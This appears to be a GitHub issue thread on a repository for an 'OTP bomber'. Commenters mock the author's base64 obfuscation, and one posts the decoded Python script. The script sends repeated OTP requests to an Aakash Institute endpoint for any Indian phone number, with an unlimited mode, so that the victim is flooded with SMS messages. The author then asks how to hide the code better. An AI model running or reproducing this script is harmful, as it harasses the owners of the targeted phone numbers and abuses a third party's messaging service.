Misterr-H / aakashotp

An OTP Bomber script using Aakash Institute servers.
3 stars 0 forks source link

Base64 encoding is not encryption #1

Open robbyoconnor opened 4 years ago

robbyoconnor commented 4 years ago

image

gargakshit commented 4 years ago

also, why python, simple bash works

gargakshit commented 4 years ago

lmao

gargakshit commented 4 years ago

image

robbyoconnor commented 4 years ago
import requests
print('Mister H')
print('Follow on IG: @__mister_h__\nTelegram: @M15T3R_H\nTelegram Group: https://t.me/TermuxNewUser\nImportant: Only supports Indian Numbers\n')
n=input("Enter 10-digit Number:")
p=input("Number of OTPs(0 for unlimited):")
try:
 if int(p)>0: 
  for i in range(int(p)):
   requests.post('https://www.aakash.ac.in/cbt/get-centre-by-city.php', data={'action':'otp','key':n})
   print('Number of requests sent:'+str(i+1))
 elif int(p)==0:
  print('Ctrl+C to Exit')
  i=0
  while True:
   i+=1
   requests.post('https://www.aakash.ac.in/cbt/get-centre-by-city.php', data={'action':'otp','key':n})
   print('Number of requests sent:'+str(i))
 else:
  print('invalid input')
except:
 print('error occured')
robbyoconnor commented 4 years ago

I don't understand why they try to obfuscate and "encrypt" using base64 lol

robbyoconnor commented 4 years ago

It's not like they can hide their shitty code -- it's easy to recover.

Misterr-H commented 3 years ago

Any suggestions Dude how to Encrypt Code? I just get hands on Base64 when I googled it!!